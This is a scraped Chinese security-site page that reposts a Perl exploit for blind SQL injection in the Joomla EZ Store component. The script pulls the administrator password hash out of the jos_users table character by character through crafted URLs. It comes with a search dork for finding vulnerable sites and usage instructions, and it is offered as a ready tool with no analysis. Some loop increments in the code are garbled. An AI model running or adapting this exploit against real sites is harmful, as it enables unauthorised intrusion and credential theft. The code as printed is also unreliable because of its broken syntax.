• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Joomla Component EZ Store Remote Blind SQL Injection Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Joomla Component EZ Store Remote Blind SQL Injection Exploit ,其中包含joomla,joomla模板,joomla官网,joomla教程,joomla下载等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long; if(!$ARGV[1])
{
print " \n";
print " ################################################################\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path <options> #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################################\n"; exit;
} my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3]; my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i"); print "[~] Exploiting...\n"; if($options{"c"})
{
$cid = $options{"c"};
} if($options{"p"})
{
$pid = $options{"p"};
} syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
} print "\n[~] Exploiting done\n"; sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $pid = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid.""; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
} }
</div>

您可能想查找下面的文章:

  • Joomla Component DT Register Remote SQL injection Vulnerability
  • Joomla Component n-forms 1.01 Blind SQL Injection Exploit
  • Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln
  • Joomla Component EZ Store Remote Blind SQL Injection Exploit

相关文章

  • IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
  • trixbox (langChoice) Local File Inclusion Exploit (connect-back)
  • Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
  • BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit
  • MFORUM 0.1a Arbitrary Add-Admin Vulnerability
  • OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
  • Simple DNS Plus
  • Safari Quicktime

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
    • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
    • trixbox (langChoice) Local File Inclusion Exploit (connect-back)
    • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)
    • Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
    • fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
    • Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
    • php Help Agent
    • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit
    • Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有